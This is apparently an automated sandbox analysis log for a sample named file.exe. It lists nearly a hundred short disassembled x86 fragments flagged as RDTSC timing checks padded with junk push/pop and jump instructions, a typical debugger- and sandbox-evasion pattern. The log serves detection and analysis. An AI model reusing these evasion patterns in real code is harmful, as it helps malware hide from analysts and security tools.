Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A4C70E second address: A4C729 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007FE9A9298656h 0x0000000e jmp 00007FE9A929865Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A4C729 second address: A4C72D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A4CC6A second address: A4CC6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A4CDE7 second address: A4CDF9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FE9A87AE1ECh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A4CDF9 second address: A4CE0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE9A929865Bh 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A4CE0A second address: A4CE1D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FE9A87AE1EAh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A4CE1D second address: A4CE23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A4CF42 second address: A4CF47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A4CF47 second address: A4CF4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A51D24 second address: A51D28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A51D28 second address: A51D2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A51D2E second address: A51D35 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FD8C6 second address: 9FD8CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A52275 second address: A5228D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9A87AE1F4h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5D517 second address: A5D521 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FE9A9298656h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5D521 second address: A5D53A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9A87AE1F3h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5B578 second address: A5B57C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5B57C second address: A5B580 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5B580 second address: A5B5DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FE9A9298668h 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 jns 00007FE9A9298656h 0x00000018 pushad 0x00000019 popad 0x0000001a jmp 00007FE9A9298660h 0x0000001f popad 0x00000020 jmp 00007FE9A9298669h 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5B5DA second address: A5B5E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5B5E0 second address: A5B5F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE9A929865Dh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5B746 second address: A5B74C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5B8BF second address: A5B8C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5B8C5 second address: A5B8CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5BBAC second address: A5BBC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE9A929865Fh 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5BBC3 second address: A5BBC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5C654 second address: A5C662 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 ja 00007FE9A9298656h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5C662 second address: A5C66A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5C66A second address: A5C670 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5C975 second address: A5C97F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FE9A87AE1E6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5C97F second address: A5C98D instructions: 0x00000000 rdtsc 0x00000002 jns 00007FE9A9298656h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5C98D second address: A5C991 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5C991 second address: A5C997 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5C997 second address: A5C9B2 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FE9A87AE1EEh 0x00000008 pushad 0x00000009 jns 00007FE9A87AE1E6h 0x0000000f push eax 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5CC62 second address: A5CC78 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FE9A9298656h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 jno 00007FE9A9298656h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5CC78 second address: A5CC7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A61FC1 second address: A61FCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FE9A9298656h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A65325 second address: A65331 instructions: 0x00000000 rdtsc 0x00000002 je 00007FE9A87AE1EEh 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A65331 second address: A65386 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007FE9A9298662h 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FE9A9298663h 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push ebx 0x00000017 jmp 00007FE9A929865Bh 0x0000001c jmp 00007FE9A9298667h 0x00000021 pop ebx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A65386 second address: A65391 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007FE9A87AE1E6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A65391 second address: A65397 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A654EF second address: A654FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push edi 0x00000006 pop edi 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A65678 second address: A6567C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6567C second address: A6568B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6568B second address: A65695 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FE9A9298656h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A657F5 second address: A657FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A657FA second address: A65806 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FE9A9298656h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6E941 second address: A6E97B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9A87AE1F6h 0x00000007 jg 00007FE9A87AE1E6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 jmp 00007FE9A87AE1F6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6E97B second address: A6E97F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6C9BF second address: A6C9D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jo 00007FE9A87AE1E6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6CB0D second address: A6CB3D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9A9298661h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FE9A929865Fh 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6CB3D second address: A6CB43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6D0E0 second address: A6D0E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6D0E4 second address: A6D113 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FE9A87AE1E6h 0x00000008 jns 00007FE9A87AE1E6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 jo 00007FE9A87AE1E6h 0x00000019 popad 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FE9A87AE1F2h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6D2A3 second address: A6D2A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6D2A7 second address: A6D2AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6D432 second address: A6D445 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE9A929865Eh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6D445 second address: A6D44A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6D44A second address: A6D450 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6D450 second address: A6D465 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FE9A87AE1E6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d jnp 00007FE9A87AE1ECh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6D5B4 second address: A6D5D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FE9A929865Fh 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jno 00007FE9A9298656h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6D5D6 second address: A6D5DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6D5DB second address: A6D5E0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6D5E0 second address: A6D5EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ecx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6D758 second address: A6D762 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6D762 second address: A6D766 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6E007 second address: A6E00B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A71A2D second address: A71A3B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007FE9A87AE1E6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A71A3B second address: A71A45 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FE9A9298656h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A71A45 second address: A71A69 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FE9A87AE1F2h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 jno 00007FE9A87AE1E6h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A76409 second address: A76438 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE9A9298666h 0x00000008 jmp 00007FE9A929865Ah 0x0000000d jg 00007FE9A9298656h 0x00000013 push eax 0x00000014 pop eax 0x00000015 popad 0x00000016 push edi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A81792 second address: A8179D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A82DC8 second address: A82DDF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE9A9298660h 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A89C71 second address: A89C89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007FE9A87AE1E6h 0x00000009 jmp 00007FE9A87AE1EDh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A94F48 second address: A94F73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE9A929865Bh 0x00000009 jmp 00007FE9A9298665h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 pop edx 0x00000012 pushad 0x00000013 popad 0x00000014 pop eax 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9B919 second address: A9B91D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9B79D second address: A9B7A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA232E second address: AA2334 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA2334 second address: AA2338 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA2338 second address: AA233C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA233C second address: AA2344 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA2344 second address: AA2354 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE9A87AE1ECh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA2354 second address: AA239E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9A9298661h 0x00000007 jo 00007FE9A9298656h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 pushad 0x00000013 jmp 00007FE9A9298668h 0x00000018 jl 00007FE9A9298656h 0x0000001e jo 00007FE9A9298656h 0x00000024 popad 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 pop eax 0x00000029 push eax 0x0000002a pop eax 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA239E second address: AA23A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA7DC9 second address: AA7DCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA7DCD second address: AA7DD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA7DD7 second address: AA7DDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA7DDB second address: AA7DDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA79AE second address: AA79B4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AA79B4 second address: AA79BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB4EB8 second address: AB4ED3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9A929865Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 jno 00007FE9A9298656h 0x0000000f ja 00007FE9A9298656h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB4ED3 second address: AB4ED7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB8CDA second address: AB8CFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 pushad 0x0000000a jmp 00007FE9A9298669h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC6AE0 second address: AC6AFD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9A87AE1F6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC6AFD second address: AC6B0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jg 00007FE9A929865Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC6B0A second address: AC6B45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE9A87AE1F8h 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007FE9A87AE1F9h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AC6B45 second address: AC6B49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD763C second address: AD76AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FE9A87AE1F4h 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 jmp 00007FE9A87AE1F7h 0x0000001b jmp 00007FE9A87AE1EFh 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 jno 00007FE9A87AE1EAh 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FE9A87AE1F6h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD76AC second address: AD76B2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD76B2 second address: AD76BC instructions: 0x00000000 rdtsc 0x00000002 js 00007FE9A87AE1F2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD76BC second address: AD76C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AD643E second address: AD6443 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
